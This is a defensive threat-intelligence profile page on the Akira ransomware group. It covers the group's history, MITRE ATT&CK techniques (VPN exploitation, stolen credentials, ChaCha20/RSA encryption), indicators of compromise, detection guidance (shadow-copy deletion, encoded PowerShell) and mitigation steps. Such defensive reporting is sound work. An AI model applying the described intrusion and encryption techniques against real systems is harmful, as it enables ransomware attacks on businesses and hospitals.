mor3intel logo
mor3intelThreat Intelligence
DashboardVictimsGroupsCountriesStatsATT&CKRulesIOC Lookup
InstagramTelegram
5 Active Threats
Back to Dashboard

Akira

active

Also known as: Akira Ransomware

Akira is a ransomware operation that emerged in March 2023 with a retro 1980s-themed leak site. The group primarily targets small to medium businesses and has been linked to the now-defunct Conti ransomware gang. They employ double extortion tactics and have shown rapid growth.

First Seen

2023-03

Last Activity

2025-01

Target Regions

3 regions

Industries

5 sectors

EducationFinanceReal EstateManufacturingHealthcare
Attack Chain (MITRE ATT&CK)
Visual representation of the attack phases and techniques used by Akira

Click on a phase to view details and MITRE ATT&CK technique IDs

Tactics & Techniques
MITRE ATT&CK mapped tactics and techniques used by this threat actor
Technique IDNameTacticDescriptionReference
T1190Exploit Public-Facing ApplicationInitial AccessExploits Cisco VPN and SonicWall vulnerabilitiesMITRE
T1078Valid AccountsInitial AccessUses compromised VPN credentials without MFAMITRE
T1486Data Encrypted for ImpactImpactChaCha20/RSA encryption with .akira extensionMITRE
Indicators of Compromise (IOCs)
Known IOCs associated with Akira operations
TypeValueDescriptionLast SeenActions
hash3c92bfc71004340ebc00146ced294bc94f49f6a5e212016ac05e7d10fcb3312cAkira ransomware Windows variant2025-01-10
domainakira[.]onionTor leak site—
filenameakira_readme.txtRansom note filename—

IOCs are defanged for safety. Click copy to get the clean value.

Detection Guidance
SIEM and EDR detection recommendations for identifying Akira activity
  • 1
    Monitor for failed Cisco VPN authentication attempts
  • 2
    Detect vssadmin.exe shadow copy deletion
  • 3
    Alert on PowerShell with encoded commands
  • 4
    Monitor for .akira file extension creation
Mitigation, Containment & Recovery
Step-by-step guidance for responding to and recovering from this ransomware attack
  • 1
    Patch Cisco VPN to latest version
  • 2
    Enable MFA on all VPN connections
  • 3
    Isolate affected systems
mor3intel logomor3intel

This platform is intended for defensive cybersecurity, incident response, and recovery purposes only. Information provided is for educational and defensive use.

@mor3cod3@mor3cod3
© 2026 mor3intel